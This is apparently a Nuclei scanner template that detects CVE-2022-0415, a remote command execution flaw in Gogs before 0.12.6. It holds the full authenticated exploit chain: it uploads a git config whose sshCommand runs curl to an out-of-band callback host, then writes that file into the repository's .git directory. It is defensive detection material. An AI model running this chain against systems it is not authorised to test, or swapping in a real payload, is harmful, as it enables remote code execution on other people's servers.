id: CVE-2022-0415

info:
  name: Gogs <0.12.6 - Remote Command Execution
  author: theamanrawat
  severity: high
  description: |
    Gogs before 0.12.6 is susceptible to remote command execution via the uploading repository file in GitHub repository gogs/gogs. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
  reference:
    - https://github.com/gogs/gogs/commit/0fef3c9082269e9a4e817274942a5d7c50617284
    - https://huntr.dev/bounties/b4928cfe-4110-462f-a180-6d5673797902
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0415
  remediation: Fixed in version 0.12.6.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2022-0415
    cwe-id: CWE-78
    cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:*
    epss-score: 0.44522
  metadata:
    max-request: 6
    verified: true
  tags: rce,gogs,authenticated,huntr,cve,cve2022

http:
  - raw:
      - |
        GET /user/login HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /user/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}

      - |
        GET /repo/create HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /repo/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&description=test&gitignores=&license=&readme=Default&auto_init=on

      - |
        POST /{{username}}/{{randstr}}/upload-file HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        X-Requested-With: XMLHttpRequest
        X-Csrf-Token: {{auth_csrf}}
        Content-Type: multipart/form-data; boundary=---------------------------313811965223810628771946318395

        -----------------------------313811965223810628771946318395
        Content-Disposition: form-data; name="file"; filename="config"
        Content-Type: application/octet-stream

        [core]
            repositoryformatversion = 0
            filemode = true
            bare = false
            logallrefupdates = true
            ignorecase = true
            precomposeunicode = true
            sshCommand = curl http://{{interactsh-url}} -I
        [remote "origin"]
            url = git@github.com:torvalds/linux.git
            fetch = +refs/heads/*:refs/remotes/origin/*
        [branch "master"]
            remote = origin
            merge = refs/heads/master
        -----------------------------313811965223810628771946318395--

      - |
        POST /{{username}}/{{randstr}}/_upload/master/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _csrf={{auth_csrf}}&tree_path=/.git/&files={{uuid}}&commit_summary=&commit_message=&commit_choice=direct&new_branch_name=


    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
          - "http"

      - type: word
        part: body_1
        words:
          - 'content="Gogs'

    extractors:
      - type: regex
        name: csrf
        group: 1
        regex:
          - 'name="_csrf" value="(.*)"'
        internal: true

      - type: regex
        name: auth_csrf
        group: 1
        regex:
          - 'name="_csrf" content="(.*)"'
        internal: true

      - type: regex
        name: uuid
        group: 1
        regex:
          - ' "uuid": "(.*)"'
        internal: true

# Enhanced by md on 2023/03/28